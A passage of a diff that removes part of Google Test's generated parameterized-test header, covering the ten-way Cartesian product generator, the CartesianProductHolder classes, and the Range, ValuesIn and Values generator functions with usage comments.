-  virtual ~CartesianProductGenerator10() {}
-
-  virtual ParamIteratorInterface<ParamType>* Begin() const {
-    return new Iterator(this, g1_, g1_.begin(), g2_, g2_.begin(), g3_,
-        g3_.begin(), g4_, g4_.begin(), g5_, g5_.begin(), g6_, g6_.begin(), g7_,
-        g7_.begin(), g8_, g8_.begin(), g9_, g9_.begin(), g10_, g10_.begin());
-  }
-  virtual ParamIteratorInterface<ParamType>* End() const {
-    return new Iterator(this, g1_, g1_.end(), g2_, g2_.end(), g3_, g3_.end(),
-        g4_, g4_.end(), g5_, g5_.end(), g6_, g6_.end(), g7_, g7_.end(), g8_,
-        g8_.end(), g9_, g9_.end(), g10_, g10_.end());
-  }
-
- private:
-  class Iterator : public ParamIteratorInterface<ParamType> {
-   public:
-    Iterator(const ParamGeneratorInterface<ParamType>* base,
-      const ParamGenerator<T1>& g1,
-      const typename ParamGenerator<T1>::iterator& current1,
-      const ParamGenerator<T2>& g2,
-      const typename ParamGenerator<T2>::iterator& current2,
-      const ParamGenerator<T3>& g3,
-      const typename ParamGenerator<T3>::iterator& current3,
-      const ParamGenerator<T4>& g4,
-      const typename ParamGenerator<T4>::iterator& current4,
-      const ParamGenerator<T5>& g5,
-      const typename ParamGenerator<T5>::iterator& current5,
-      const ParamGenerator<T6>& g6,
-      const typename ParamGenerator<T6>::iterator& current6,
-      const ParamGenerator<T7>& g7,
-      const typename ParamGenerator<T7>::iterator& current7,
-      const ParamGenerator<T8>& g8,
-      const typename ParamGenerator<T8>::iterator& current8,
-      const ParamGenerator<T9>& g9,
-      const typename ParamGenerator<T9>::iterator& current9,
-      const ParamGenerator<T10>& g10,
-      const typename ParamGenerator<T10>::iterator& current10)
-        : base_(base),
-          begin1_(g1.begin()), end1_(g1.end()), current1_(current1),
-          begin2_(g2.begin()), end2_(g2.end()), current2_(current2),
-          begin3_(g3.begin()), end3_(g3.end()), current3_(current3),
-          begin4_(g4.begin()), end4_(g4.end()), current4_(current4),
-          begin5_(g5.begin()), end5_(g5.end()), current5_(current5),
-          begin6_(g6.begin()), end6_(g6.end()), current6_(current6),
-          begin7_(g7.begin()), end7_(g7.end()), current7_(current7),
-          begin8_(g8.begin()), end8_(g8.end()), current8_(current8),
-          begin9_(g9.begin()), end9_(g9.end()), current9_(current9),
-          begin10_(g10.begin()), end10_(g10.end()), current10_(current10)    {
-      ComputeCurrentValue();
-    }
-    virtual ~Iterator() {}
-
-    virtual const ParamGeneratorInterface<ParamType>* BaseGenerator() const {
-      return base_;
-    }
-    // Advance should not be called on beyond-of-range iterators
-    // so no component iterators must be beyond end of range, either.
-    virtual void Advance() {
-      assert(!AtEnd());
-      ++current10_;
-      if (current10_ == end10_) {
-        current10_ = begin10_;
-        ++current9_;
-      }
-      if (current9_ == end9_) {
-        current9_ = begin9_;
-        ++current8_;
-      }
-      if (current8_ == end8_) {
-        current8_ = begin8_;
-        ++current7_;
-      }
-      if (current7_ == end7_) {
-        current7_ = begin7_;
-        ++current6_;
-      }
-      if (current6_ == end6_) {
-        current6_ = begin6_;
-        ++current5_;
-      }
-      if (current5_ == end5_) {
-        current5_ = begin5_;
-        ++current4_;
-      }
-      if (current4_ == end4_) {
-        current4_ = begin4_;
-        ++current3_;
-      }
-      if (current3_ == end3_) {
-        current3_ = begin3_;
-        ++current2_;
-      }
-      if (current2_ == end2_) {
-        current2_ = begin2_;
-        ++current1_;
-      }
-      ComputeCurrentValue();
-    }
-    virtual ParamIteratorInterface<ParamType>* Clone() const {
-      return new Iterator(*this);
-    }
-    virtual const ParamType* Current() const { return &current_value_; }
-    virtual bool Equals(const ParamIteratorInterface<ParamType>& other) const {
-      // Having the same base generator guarantees that the other
-      // iterator is of the same type and we can downcast.
-      GTEST_CHECK_(BaseGenerator() == other.BaseGenerator())
-          << "The program attempted to compare iterators "
-          << "from different generators." << std::endl;
-      const Iterator* typed_other =
-          CheckedDowncastToActualType<const Iterator>(&other);
-      // We must report iterators equal if they both point beyond their
-      // respective ranges. That can happen in a variety of fashions,
-      // so we have to consult AtEnd().
-      return (AtEnd() && typed_other->AtEnd()) ||
-         (
-          current1_ == typed_other->current1_ &&
-          current2_ == typed_other->current2_ &&
-          current3_ == typed_other->current3_ &&
-          current4_ == typed_other->current4_ &&
-          current5_ == typed_other->current5_ &&
-          current6_ == typed_other->current6_ &&
-          current7_ == typed_other->current7_ &&
-          current8_ == typed_other->current8_ &&
-          current9_ == typed_other->current9_ &&
-          current10_ == typed_other->current10_);
-    }
-
-   private:
-    Iterator(const Iterator& other)
-        : base_(other.base_),
-        begin1_(other.begin1_),
-        end1_(other.end1_),
-        current1_(other.current1_),
-        begin2_(other.begin2_),
-        end2_(other.end2_),
-        current2_(other.current2_),
-        begin3_(other.begin3_),
-        end3_(other.end3_),
-        current3_(other.current3_),
-        begin4_(other.begin4_),
-        end4_(other.end4_),
-        current4_(other.current4_),
-        begin5_(other.begin5_),
-        end5_(other.end5_),
-        current5_(other.current5_),
-        begin6_(other.begin6_),
-        end6_(other.end6_),
-        current6_(other.current6_),
-        begin7_(other.begin7_),
-        end7_(other.end7_),
-        current7_(other.current7_),
-        begin8_(other.begin8_),
-        end8_(other.end8_),
-        current8_(other.current8_),
-        begin9_(other.begin9_),
-        end9_(other.end9_),
-        current9_(other.current9_),
-        begin10_(other.begin10_),
-        end10_(other.end10_),
-        current10_(other.current10_) {
-      ComputeCurrentValue();
-    }
-
-    void ComputeCurrentValue() {
-      if (!AtEnd())
-        current_value_ = ParamType(*current1_, *current2_, *current3_,
-            *current4_, *current5_, *current6_, *current7_, *current8_,
-            *current9_, *current10_);
-    }
-    bool AtEnd() const {
-      // We must report iterator past the end of the range when either of the
-      // component iterators has reached the end of its range.
-      return
-          current1_ == end1_ ||
-          current2_ == end2_ ||
-          current3_ == end3_ ||
-          current4_ == end4_ ||
-          current5_ == end5_ ||
-          current6_ == end6_ ||
-          current7_ == end7_ ||
-          current8_ == end8_ ||
-          current9_ == end9_ ||
-          current10_ == end10_;
-    }
-
-    // No implementation - assignment is unsupported.
-    void operator=(const Iterator& other);
-
-    const ParamGeneratorInterface<ParamType>* const base_;
-    // begin[i]_ and end[i]_ define the i-th range that Iterator traverses.
-    // current[i]_ is the actual traversing iterator.
-    const typename ParamGenerator<T1>::iterator begin1_;
-    const typename ParamGenerator<T1>::iterator end1_;
-    typename ParamGenerator<T1>::iterator current1_;
-    const typename ParamGenerator<T2>::iterator begin2_;
-    const typename ParamGenerator<T2>::iterator end2_;
-    typename ParamGenerator<T2>::iterator current2_;
-    const typename ParamGenerator<T3>::iterator begin3_;
-    const typename ParamGenerator<T3>::iterator end3_;
-    typename ParamGenerator<T3>::iterator current3_;
-    const typename ParamGenerator<T4>::iterator begin4_;
-    const typename ParamGenerator<T4>::iterator end4_;
-    typename ParamGenerator<T4>::iterator current4_;
-    const typename ParamGenerator<T5>::iterator begin5_;
-    const typename ParamGenerator<T5>::iterator end5_;
-    typename ParamGenerator<T5>::iterator current5_;
-    const typename ParamGenerator<T6>::iterator begin6_;
-    const typename ParamGenerator<T6>::iterator end6_;
-    typename ParamGenerator<T6>::iterator current6_;
-    const typename ParamGenerator<T7>::iterator begin7_;
-    const typename ParamGenerator<T7>::iterator end7_;
-    typename ParamGenerator<T7>::iterator current7_;
-    const typename ParamGenerator<T8>::iterator begin8_;
-    const typename ParamGenerator<T8>::iterator end8_;
-    typename ParamGenerator<T8>::iterator current8_;
-    const typename ParamGenerator<T9>::iterator begin9_;
-    const typename ParamGenerator<T9>::iterator end9_;
-    typename ParamGenerator<T9>::iterator current9_;
-    const typename ParamGenerator<T10>::iterator begin10_;
-    const typename ParamGenerator<T10>::iterator end10_;
-    typename ParamGenerator<T10>::iterator current10_;
-    ParamType current_value_;
-  };  // class CartesianProductGenerator10::Iterator
-
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductGenerator10& other);
-
-  const ParamGenerator<T1> g1_;
-  const ParamGenerator<T2> g2_;
-  const ParamGenerator<T3> g3_;
-  const ParamGenerator<T4> g4_;
-  const ParamGenerator<T5> g5_;
-  const ParamGenerator<T6> g6_;
-  const ParamGenerator<T7> g7_;
-  const ParamGenerator<T8> g8_;
-  const ParamGenerator<T9> g9_;
-  const ParamGenerator<T10> g10_;
-};  // class CartesianProductGenerator10
-
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-//
-// Helper classes providing Combine() with polymorphic features. They allow
-// casting CartesianProductGeneratorN<T> to ParamGenerator<U> if T is
-// convertible to U.
-//
-template <class Generator1, class Generator2>
-class CartesianProductHolder2 {
- public:
-CartesianProductHolder2(const Generator1& g1, const Generator2& g2)
-      : g1_(g1), g2_(g2) {}
-  template <typename T1, typename T2>
-  operator ParamGenerator< ::testing::tuple<T1, T2> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2> >(
-        new CartesianProductGenerator2<T1, T2>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder2& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-};  // class CartesianProductHolder2
-
-template <class Generator1, class Generator2, class Generator3>
-class CartesianProductHolder3 {
- public:
-CartesianProductHolder3(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3)
-      : g1_(g1), g2_(g2), g3_(g3) {}
-  template <typename T1, typename T2, typename T3>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3> >(
-        new CartesianProductGenerator3<T1, T2, T3>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder3& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-};  // class CartesianProductHolder3
-
-template <class Generator1, class Generator2, class Generator3,
-    class Generator4>
-class CartesianProductHolder4 {
- public:
-CartesianProductHolder4(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3, const Generator4& g4)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4) {}
-  template <typename T1, typename T2, typename T3, typename T4>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3, T4> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3, T4> >(
-        new CartesianProductGenerator4<T1, T2, T3, T4>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_),
-        static_cast<ParamGenerator<T4> >(g4_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder4& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-  const Generator4 g4_;
-};  // class CartesianProductHolder4
-
-template <class Generator1, class Generator2, class Generator3,
-    class Generator4, class Generator5>
-class CartesianProductHolder5 {
- public:
-CartesianProductHolder5(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3, const Generator4& g4, const Generator5& g5)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5) {}
-  template <typename T1, typename T2, typename T3, typename T4, typename T5>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5> >(
-        new CartesianProductGenerator5<T1, T2, T3, T4, T5>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_),
-        static_cast<ParamGenerator<T4> >(g4_),
-        static_cast<ParamGenerator<T5> >(g5_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder5& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-  const Generator4 g4_;
-  const Generator5 g5_;
-};  // class CartesianProductHolder5
-
-template <class Generator1, class Generator2, class Generator3,
-    class Generator4, class Generator5, class Generator6>
-class CartesianProductHolder6 {
- public:
-CartesianProductHolder6(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3, const Generator4& g4, const Generator5& g5,
-    const Generator6& g6)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6) {}
-  template <typename T1, typename T2, typename T3, typename T4, typename T5,
-      typename T6>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6> >(
-        new CartesianProductGenerator6<T1, T2, T3, T4, T5, T6>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_),
-        static_cast<ParamGenerator<T4> >(g4_),
-        static_cast<ParamGenerator<T5> >(g5_),
-        static_cast<ParamGenerator<T6> >(g6_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder6& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-  const Generator4 g4_;
-  const Generator5 g5_;
-  const Generator6 g6_;
-};  // class CartesianProductHolder6
-
-template <class Generator1, class Generator2, class Generator3,
-    class Generator4, class Generator5, class Generator6, class Generator7>
-class CartesianProductHolder7 {
- public:
-CartesianProductHolder7(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3, const Generator4& g4, const Generator5& g5,
-    const Generator6& g6, const Generator7& g7)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7) {}
-  template <typename T1, typename T2, typename T3, typename T4, typename T5,
-      typename T6, typename T7>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6,
-      T7> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6, T7> >(
-        new CartesianProductGenerator7<T1, T2, T3, T4, T5, T6, T7>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_),
-        static_cast<ParamGenerator<T4> >(g4_),
-        static_cast<ParamGenerator<T5> >(g5_),
-        static_cast<ParamGenerator<T6> >(g6_),
-        static_cast<ParamGenerator<T7> >(g7_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder7& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-  const Generator4 g4_;
-  const Generator5 g5_;
-  const Generator6 g6_;
-  const Generator7 g7_;
-};  // class CartesianProductHolder7
-
-template <class Generator1, class Generator2, class Generator3,
-    class Generator4, class Generator5, class Generator6, class Generator7,
-    class Generator8>
-class CartesianProductHolder8 {
- public:
-CartesianProductHolder8(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3, const Generator4& g4, const Generator5& g5,
-    const Generator6& g6, const Generator7& g7, const Generator8& g8)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7),
-          g8_(g8) {}
-  template <typename T1, typename T2, typename T3, typename T4, typename T5,
-      typename T6, typename T7, typename T8>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6, T7,
-      T8> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8> >(
-        new CartesianProductGenerator8<T1, T2, T3, T4, T5, T6, T7, T8>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_),
-        static_cast<ParamGenerator<T4> >(g4_),
-        static_cast<ParamGenerator<T5> >(g5_),
-        static_cast<ParamGenerator<T6> >(g6_),
-        static_cast<ParamGenerator<T7> >(g7_),
-        static_cast<ParamGenerator<T8> >(g8_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder8& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-  const Generator4 g4_;
-  const Generator5 g5_;
-  const Generator6 g6_;
-  const Generator7 g7_;
-  const Generator8 g8_;
-};  // class CartesianProductHolder8
-
-template <class Generator1, class Generator2, class Generator3,
-    class Generator4, class Generator5, class Generator6, class Generator7,
-    class Generator8, class Generator9>
-class CartesianProductHolder9 {
- public:
-CartesianProductHolder9(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3, const Generator4& g4, const Generator5& g5,
-    const Generator6& g6, const Generator7& g7, const Generator8& g8,
-    const Generator9& g9)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7), g8_(g8),
-          g9_(g9) {}
-  template <typename T1, typename T2, typename T3, typename T4, typename T5,
-      typename T6, typename T7, typename T8, typename T9>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8,
-      T9> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8,
-        T9> >(
-        new CartesianProductGenerator9<T1, T2, T3, T4, T5, T6, T7, T8, T9>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_),
-        static_cast<ParamGenerator<T4> >(g4_),
-        static_cast<ParamGenerator<T5> >(g5_),
-        static_cast<ParamGenerator<T6> >(g6_),
-        static_cast<ParamGenerator<T7> >(g7_),
-        static_cast<ParamGenerator<T8> >(g8_),
-        static_cast<ParamGenerator<T9> >(g9_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder9& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-  const Generator4 g4_;
-  const Generator5 g5_;
-  const Generator6 g6_;
-  const Generator7 g7_;
-  const Generator8 g8_;
-  const Generator9 g9_;
-};  // class CartesianProductHolder9
-
-template <class Generator1, class Generator2, class Generator3,
-    class Generator4, class Generator5, class Generator6, class Generator7,
-    class Generator8, class Generator9, class Generator10>
-class CartesianProductHolder10 {
- public:
-CartesianProductHolder10(const Generator1& g1, const Generator2& g2,
-    const Generator3& g3, const Generator4& g4, const Generator5& g5,
-    const Generator6& g6, const Generator7& g7, const Generator8& g8,
-    const Generator9& g9, const Generator10& g10)
-      : g1_(g1), g2_(g2), g3_(g3), g4_(g4), g5_(g5), g6_(g6), g7_(g7), g8_(g8),
-          g9_(g9), g10_(g10) {}
-  template <typename T1, typename T2, typename T3, typename T4, typename T5,
-      typename T6, typename T7, typename T8, typename T9, typename T10>
-  operator ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8, T9,
-      T10> >() const {
-    return ParamGenerator< ::testing::tuple<T1, T2, T3, T4, T5, T6, T7, T8, T9,
-        T10> >(
-        new CartesianProductGenerator10<T1, T2, T3, T4, T5, T6, T7, T8, T9,
-            T10>(
-        static_cast<ParamGenerator<T1> >(g1_),
-        static_cast<ParamGenerator<T2> >(g2_),
-        static_cast<ParamGenerator<T3> >(g3_),
-        static_cast<ParamGenerator<T4> >(g4_),
-        static_cast<ParamGenerator<T5> >(g5_),
-        static_cast<ParamGenerator<T6> >(g6_),
-        static_cast<ParamGenerator<T7> >(g7_),
-        static_cast<ParamGenerator<T8> >(g8_),
-        static_cast<ParamGenerator<T9> >(g9_),
-        static_cast<ParamGenerator<T10> >(g10_)));
-  }
-
- private:
-  // No implementation - assignment is unsupported.
-  void operator=(const CartesianProductHolder10& other);
-
-  const Generator1 g1_;
-  const Generator2 g2_;
-  const Generator3 g3_;
-  const Generator4 g4_;
-  const Generator5 g5_;
-  const Generator6 g6_;
-  const Generator7 g7_;
-  const Generator8 g8_;
-  const Generator9 g9_;
-  const Generator10 g10_;
-};  // class CartesianProductHolder10
-
-# endif  // GTEST_HAS_COMBINE
-
-}  // namespace internal
-}  // namespace testing
-
-#endif  //  GTEST_HAS_PARAM_TEST
-
-#endif  // GTEST_INCLUDE_GTEST_INTERNAL_GTEST_PARAM_UTIL_GENERATED_H_
-
-#if GTEST_HAS_PARAM_TEST
-
-namespace testing {
-
-// Functions producing parameter generators.
-//
-// Google Test uses these generators to produce parameters for value-
-// parameterized tests. When a parameterized test case is instantiated
-// with a particular generator, Google Test creates and runs tests
-// for each element in the sequence produced by the generator.
-//
-// In the following sample, tests from test case FooTest are instantiated
-// each three times with parameter values 3, 5, and 8:
-//
-// class FooTest : public TestWithParam<int> { ... };
-//
-// TEST_P(FooTest, TestThis) {
-// }
-// TEST_P(FooTest, TestThat) {
-// }
-// INSTANTIATE_TEST_CASE_P(TestSequence, FooTest, Values(3, 5, 8));
-//
-
-// Range() returns generators providing sequences of values in a range.
-//
-// Synopsis:
-// Range(start, end)
-//   - returns a generator producing a sequence of values {start, start+1,
-//     start+2, ..., }.
-// Range(start, end, step)
-//   - returns a generator producing a sequence of values {start, start+step,
-//     start+step+step, ..., }.
-// Notes:
-//   * The generated sequences never include end. For example, Range(1, 5)
-//     returns a generator producing a sequence {1, 2, 3, 4}. Range(1, 9, 2)
-//     returns a generator producing {1, 3, 5, 7}.
-//   * start and end must have the same type. That type may be any integral or
-//     floating-point type or a user defined type satisfying these conditions:
-//     * It must be assignable (have operator=() defined).
-//     * It must have operator+() (operator+(int-compatible type) for
-//       two-operand version).
-//     * It must have operator<() defined.
-//     Elements in the resulting sequences will also have that type.
-//   * Condition start < end must be satisfied in order for resulting sequences
-//     to contain any elements.
-//
-template <typename T, typename IncrementT>
-internal::ParamGenerator<T> Range(T start, T end, IncrementT step) {
-  return internal::ParamGenerator<T>(
-      new internal::RangeGenerator<T, IncrementT>(start, end, step));
-}
-
-template <typename T>
-internal::ParamGenerator<T> Range(T start, T end) {
-  return Range(start, end, 1);
-}
-
-// ValuesIn() function allows generation of tests with parameters coming from
-// a container.
-//
-// Synopsis:
-// ValuesIn(const T (&array)[N])
-//   - returns a generator producing sequences with elements from
-//     a C-style array.
-// ValuesIn(const Container& container)
-//   - returns a generator producing sequences with elements from
-//     an STL-style container.
-// ValuesIn(Iterator begin, Iterator end)
-//   - returns a generator producing sequences with elements from
-//     a range [begin, end) defined by a pair of STL-style iterators. These
-//     iterators can also be plain C pointers.
-//
-// Please note that ValuesIn copies the values from the containers
-// passed in and keeps them to generate tests in RUN_ALL_TESTS().
-//
-// Examples:
-//
-// This instantiates tests from test case StringTest
-// each with C-string values of "foo", "bar", and "baz":
-//
-// const char* strings[] = {"foo", "bar", "baz"};
-// INSTANTIATE_TEST_CASE_P(StringSequence, SrtingTest, ValuesIn(strings));
-//
-// This instantiates tests from test case StlStringTest
-// each with STL strings with values "a" and "b":
-//
-// ::std::vector< ::std::string> GetParameterStrings() {
-//   ::std::vector< ::std::string> v;
-//   v.push_back("a");
-//   v.push_back("b");
-//   return v;
-// }
-//
-// INSTANTIATE_TEST_CASE_P(CharSequence,
-//                         StlStringTest,
-//                         ValuesIn(GetParameterStrings()));
-//
-//
-// This will also instantiate tests from CharTest
-// each with parameter values 'a' and 'b':
-//
-// ::std::list<char> GetParameterChars() {
-//   ::std::list<char> list;
-//   list.push_back('a');
-//   list.push_back('b');
-//   return list;
-// }
-// ::std::list<char> l = GetParameterChars();
-// INSTANTIATE_TEST_CASE_P(CharSequence2,
-//                         CharTest,
-//                         ValuesIn(l.begin(), l.end()));
-//
-template <typename ForwardIterator>
-internal::ParamGenerator<
-  typename ::testing::internal::IteratorTraits<ForwardIterator>::value_type>
-ValuesIn(ForwardIterator begin, ForwardIterator end) {
-  typedef typename ::testing::internal::IteratorTraits<ForwardIterator>
-      ::value_type ParamType;
-  return internal::ParamGenerator<ParamType>(
-      new internal::ValuesInIteratorRangeGenerator<ParamType>(begin, end));
-}
-
-template <typename T, size_t N>
-internal::ParamGenerator<T> ValuesIn(const T (&array)[N]) {
-  return ValuesIn(array, array + N);
-}
-
-template <class Container>
-internal::ParamGenerator<typename Container::value_type> ValuesIn(
-    const Container& container) {
-  return ValuesIn(container.begin(), container.end());
-}
-
-// Values() allows generating tests from explicitly specified list of
-// parameters.
-//
-// Synopsis:
-// Values(T v1, T v2, ..., T vN)
-//   - returns a generator producing sequences with elements v1, v2, ..., vN.
-//
-// For example, this instantiates tests from test case BarTest each
-// with values "one", "two", and "three":
-//
-// INSTANTIATE_TEST_CASE_P(NumSequence, BarTest, Values("one", "two", "three"));
-//
-// This instantiates tests from test case BazTest each with values 1, 2, 3.5.
-// The exact type of values will depend on the type of parameter in BazTest.
-//
-// INSTANTIATE_TEST_CASE_P(FloatingNumbers, BazTest, Values(1, 2, 3.5));
-//
-// Currently, Values() supports from 1 to 50 parameters.
-//
-template <typename T1>
-internal::ValueArray1<T1> Values(T1 v1) {
-  return internal::ValueArray1<T1>(v1);
-}
-
-template <typename T1, typename T2>
-internal::ValueArray2<T1, T2> Values(T1 v1, T2 v2) {
-  return internal::ValueArray2<T1, T2>(v1, v2);
-}
-
-template <typename T1, typename T2, typename T3>
-internal::ValueArray3<T1, T2, T3> Values(T1 v1, T2 v2, T3 v3) {
-  return internal::ValueArray3<T1, T2, T3>(v1, v2, v3);
-}
-
-template <typename T1, typename T2, typename T3, typename T4>
-internal::ValueArray4<T1, T2, T3, T4> Values(T1 v1, T2 v2, T3 v3, T4 v4) {
-  return internal::ValueArray4<T1, T2, T3, T4>(v1, v2, v3, v4);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5>
-internal::ValueArray5<T1, T2, T3, T4, T5> Values(T1 v1, T2 v2, T3 v3, T4 v4,
-    T5 v5) {
-  return internal::ValueArray5<T1, T2, T3, T4, T5>(v1, v2, v3, v4, v5);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6>
-internal::ValueArray6<T1, T2, T3, T4, T5, T6> Values(T1 v1, T2 v2, T3 v3,
-    T4 v4, T5 v5, T6 v6) {
-  return internal::ValueArray6<T1, T2, T3, T4, T5, T6>(v1, v2, v3, v4, v5, v6);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7>
-internal::ValueArray7<T1, T2, T3, T4, T5, T6, T7> Values(T1 v1, T2 v2, T3 v3,
-    T4 v4, T5 v5, T6 v6, T7 v7) {
-  return internal::ValueArray7<T1, T2, T3, T4, T5, T6, T7>(v1, v2, v3, v4, v5,
-      v6, v7);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8>
-internal::ValueArray8<T1, T2, T3, T4, T5, T6, T7, T8> Values(T1 v1, T2 v2,
-    T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8) {
-  return internal::ValueArray8<T1, T2, T3, T4, T5, T6, T7, T8>(v1, v2, v3, v4,
-      v5, v6, v7, v8);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9>
-internal::ValueArray9<T1, T2, T3, T4, T5, T6, T7, T8, T9> Values(T1 v1, T2 v2,
-    T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9) {
-  return internal::ValueArray9<T1, T2, T3, T4, T5, T6, T7, T8, T9>(v1, v2, v3,
-      v4, v5, v6, v7, v8, v9);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10>
-internal::ValueArray10<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10> Values(T1 v1,
-    T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9, T10 v10) {
-  return internal::ValueArray10<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10>(v1,
-      v2, v3, v4, v5, v6, v7, v8, v9, v10);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11>
-internal::ValueArray11<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10,
-    T11> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11) {
-  return internal::ValueArray11<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10,
-      T11>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12>
-internal::ValueArray12<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-    T12> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12) {
-  return internal::ValueArray12<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13>
-internal::ValueArray13<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-    T13> Values(T1 v1, T2 v2, T3 v3, T4 v4, T5 v5, T6 v6, T7 v7, T8 v8, T9 v9,
-    T10 v10, T11 v11, T12 v12, T13 v13) {
-  return internal::ValueArray13<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11,
-      T12, T13>(v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13);
-}
-
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
